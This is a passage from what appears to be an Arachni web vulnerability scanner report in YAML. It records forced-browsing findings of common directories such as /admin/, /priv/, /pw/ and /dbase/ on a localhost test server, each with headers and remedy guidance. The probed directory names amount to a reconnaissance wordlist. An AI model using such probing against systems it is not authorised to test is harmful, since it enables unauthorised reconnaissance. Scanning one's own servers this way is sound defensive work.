    - directory
    - common
    - discovery
    url: http://localhost:7470/bin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/Admin_files/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "11"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: Admin_files
    injected: Admin_files
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: Admin_files
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/Admin_files/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/credit/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: credit
    injected: credit
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: credit
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/credit/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/public/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: public
    injected: public
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: public
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/public/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/dbase/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: dbase
    injected: dbase
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: dbase
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/dbase/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/priv/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: priv
    injected: priv
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: priv
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/priv/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/customer/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: customer
    injected: customer
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: customer
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/customer/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/customers/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: customers
    injected: customers
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: customers
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/customers/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/asp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: asp
    injected: asp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: asp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/asp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/java/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: java
    injected: java
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: java
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/java/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/jrun/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: jrun
    injected: jrun
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: jrun
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/jrun/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/job/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: job
    injected: job
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: job
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/job/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/zipfiles/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "8"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: zipfiles
    injected: zipfiles
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: zipfiles
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/zipfiles/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/pw/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "2"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: pw
    injected: pw
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: pw
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/pw/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/admin/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: admin
    injected: admin
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: admin
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/admin/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/new/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: new
    injected: new
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: new
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/new/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/adm/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: adm
    injected: adm
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: adm
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/adm/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/oracle/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: oracle
    injected: oracle
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: oracle
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/oracle/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/odbc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: odbc
    injected: odbc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: odbc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/odbc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/mall_log_files/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "14"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: mall_log_files
    injected: mall_log_files
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: mall_log_files
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/mall_log_files/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/order/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: order
    injected: order
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: order
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/order/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
